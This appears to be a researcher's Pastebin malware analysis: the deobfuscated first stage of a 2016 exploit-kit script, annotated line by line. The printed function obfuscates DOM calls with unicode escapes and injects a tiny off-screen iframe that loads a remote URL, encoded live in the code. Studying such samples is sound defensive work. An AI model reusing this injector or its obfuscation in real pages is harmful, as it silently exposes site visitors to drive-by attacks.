Neonprimetime

Deobfuscated 1st layer Exploit Kit Javascript from Malware Traffic analysis

Jun 3rd, 2016
  1. Deobfuscated 1st layer Exploit Kit Javascript from Malware Traffic analysis
  2. http://www.malware-traffic-analysis.net/2016/06/02/index.html
  3. original javascript posted here http://pastebin.com/KrvFUf5W
  4.  
  5. *****
  6. Below is the code generated by the last statements of the original javascript (the string returned by vrDCFrjI, which is compiled with new Function and then executed):
  7.  NLxwWpg = new Function(vrDCFrjI(MTEzMzMzNTAxOQ, Mjk2MjkxMDI1MQ));
  8.  NLxwWpg();
  9. *****
  10.  
  11. function MjE4Mzk3MzYzNw() { // Analyst note: creates a 13x13 iframe positioned far off-screen, points it at a remote URL and appends it to <body>. Every DOM name is assembled from \uXXXX escapes so the names never appear as plain strings; none of the assignments use var, so in non-strict code they become globals.
  12.     Sgjb6 = '\u006e' + '\u0061' + '\u0076' + '\u0069' + '\u0067' + '\u0061' + '\u0074' + '\u006f' + '\u0072'; // "navigator" (not referenced again in this listing)
  13.     Sgjb5 = '\u0064' + '\u006f' + '\u0063' + '\u0075' + '\u006d' + '\u0065' + '\u006e' + '\u0074'; // "document"
  14.     Sgjb7 = window;
  15.     Sgjb8 = document; // not referenced again in this listing
  16.     Sgjb9 = Sgjb7[Sgjb5]; // window["document"]
  17.     Sgjb = '\u0073' + '\u0072' + '\u0063'; // "src"
  18.     FIMrs = '\u0069' + '\u0066' + '\u0072' + '\u0061' + '\u006d' + '\u0065'; // "iframe"
  19.     RbGEGsI = '\u0063' + '\u0073' + '\u0073' + '\u0054' + '\u0065' + '\u0078' + '\u0074'; // "cssText"
  20.     vBiNhRC = '\u0067' + '\u0065' + '\u0074' + '\u0045' + '\u006c' + '\u0065' + '\u006d' + '\u0065' + '\u006e' + '\u0074' + '\u0073' + '\u0042' + '\u0079' + '\u0054' + '\u0061' + '\u0067' + '\u004e' + '\u0061' + '\u006d' + '\u0065'; // "getElementsByTagName"
  21.     WvVBTR = '\u0062' + '\u006f' + '\u0064' + '\u0079'; // "body"
  22.     MAx = '\u0077' + '\u0069' + '\u0064' + '\u0074' + '\u0068'; // "width"
  23.     gUtk = '\u0068' + '\u0065' + '\u0069' + '\u0067' + '\u0068' + '\u0074'; // "height"
  24.     BUMx = '\u0061' + '\u0070' + '\u0070' + '\u0065' + '\u006e' + '\u0064' + '\u0043' + '\u0068' + '\u0069' + '\u006c' + '\u0064'; // "appendChild"
  25.     PzmfZG = '\u0063' + '\u0072' + '\u0065' + '\u0061' + '\u0074' + '\u0065' + '\u0045' + '\u006c' + '\u0065' + '\u006d' + '\u0065' + '\u006e' + '\u0074'; // "createElement"
  26.     Sgjb0 = '\u0073' + '\u0074' + '\u0079' + '\u006c' + '\u0065'; // "style"
  27.     Sgjb1 = '\u0031' + '\u0033'; // "13"
  28.     Sgjb2 = Sgjb1; // "13", used for both width and height below
  29.     Sgjb3 = '\u0070' + '\u006f' + '\u0073' + '\u0069' + '\u0074' + '\u0069' + '\u006f' + '\u006e' + '\u003a' + '\u0061' + '\u0062' + '\u0073' + '\u006f' + '\u006c' + '\u0075' + '\u0074' + '\u0065' + '\u003b' + '\u006c' + '\u0065' + '\u0066' + '\u0074' + '\u003a' + '\u002d' + '\u0031' + '\u0036' + '\u0035' + '\u0038' + '\u0070' + '\u0078' + '\u003b' + '\u0074' + '\u006f' + '\u0070' + '\u003a' + '\u002d' + '\u0031' + '\u0036' + '\u0036' + '\u0038' + '\u0070' + '\u0078'; // "position:absolute;left:-1658px;top:-1668px" (large negative offsets place the frame outside the visible page)
  30.     Sgjb4 = Sgjb9[PzmfZG](FIMrs); // document.createElement("iframe")
  31.     Sgjb4[MAx] = Sgjb2; // iframe.width = "13"
  32.     Sgjb4[gUtk] = Sgjb2; // iframe.height = "13"
  33.     Sgjb4[Sgjb0][RbGEGsI] = Sgjb3; // iframe.style.cssText = the off-screen positioning string
  34.     Sgjb4[Sgjb] = '\u0068' + '\u0074' + '\u0074' + '\u0070' + '\u003a' + '\u002f' + '\u002f' + '\u0073' + '\u0074' + '\u0072' + '\u0061' + '\u0063' + '\u0068' + '\u0075' + '\u0062' + '\u0065' + '\u0064' + '\u0061' + '\u0062' + '\u0062' + '\u006c' + '\u0069' + '\u006e' + '\u0067' + '\u002e' + '\u0074' + '\u0068' + '\u006f' + '\u006d' + '\u0070' + '\u0073' + '\u006f' + '\u006e' + '\u0073' + '\u002d' + '\u006f' + '\u006e' + '\u006c' + '\u0069' + '\u006e' + '\u0065' + '\u002e' + '\u0063' + '\u006f' + '\u002e' + '\u0075' + '\u006b' + '\u002f' + '\u0059' + '\u0078' + '\u0075' + '\u005a' + '\u0059' + '\u0052' + '\u002f' + '\u0072' + '\u0054' + '\u006b' + '\u004e' + '\u006e' + '\u004c' + '\u0055' + '\u002f' + '\u0066' + '\u004f' + '\u0068' + '\u0058' + '\u0058' + '\u006a' + '\u0070' + '\u0065' + '\u0059' + '\u002f' + '\u0030' + '\u0030' + '\u0037' + '\u0035' + '\u0037' + '\u002f' + '\u0073' + '\u0064' + '\u006d' + '\u006d' + '\u0054' + '\u0071' + '\u0062' + '\u0077' + '\u0064' + '\u0078' + '\u002d' + '\u0030' + '\u0039' + '\u0032' + '\u0036' + '\u0032' + '\u0030' + '\u002d' + '\u007a' + '\u006b' + '\u0062' + '\u0067' + '\u0072' + '\u0077' + '\u0068' + '\u0069' + '\u002e' + '\u006a' + '\u0070' + '\u0067'; // iframe.src; decodes (defanged) to hxxp://strachubedabbling[.]thompsons-online[.]co[.]uk/YxuZYR/rTkNnLU/fOhXXjpeY/00757/sdmmTqbwdx-092620-zkbgrwhi.jpg -- the path ends in .jpg although it is loaded as an iframe document; what the URL served is not shown on this page
  35.     Sgjb9[vBiNhRC](WvVBTR)[0][BUMx + ''](Sgjb4) // document.getElementsByTagName("body")[0].appendChild(iframe): attaching the frame is what triggers the request to the URL above
  36. }
  37.  
  38. function ldNRgDCf() { // Analyst note: waits for document.body to exist, then runs the iframe injector MjE4Mzk3MzYzNw.
  39.     var FIMrs0 = setTimeout; // alias, so the timer call below does not appear under its usual name
  40.     var FIMrs1 = document.body; // falsy until the parser has created <body>
  41.     return (!FIMrs1 ? FIMrs0(ldNRgDCf, 10) : MjE4Mzk3MzYzNw()); // no body yet: re-run this function in 10 ms; body present: inject the iframe
  42. }
  43. ldNRgDCf(); // entry point: starts the wait-for-body loop as soon as this generated code is executed
  44.  
  45.  
  46.  
  47. *******
  48. *******
  49. *******
  50. More FROM @neonprimetime security
  51.  
  52. http://pastebin.com/u/Neonprimetime
  53. https://www.virustotal.com/en/USER/neonprimetime/
  54. https://twitter.com/neonprimetime
  55. https://www.reddit.com/USER/neonprimetime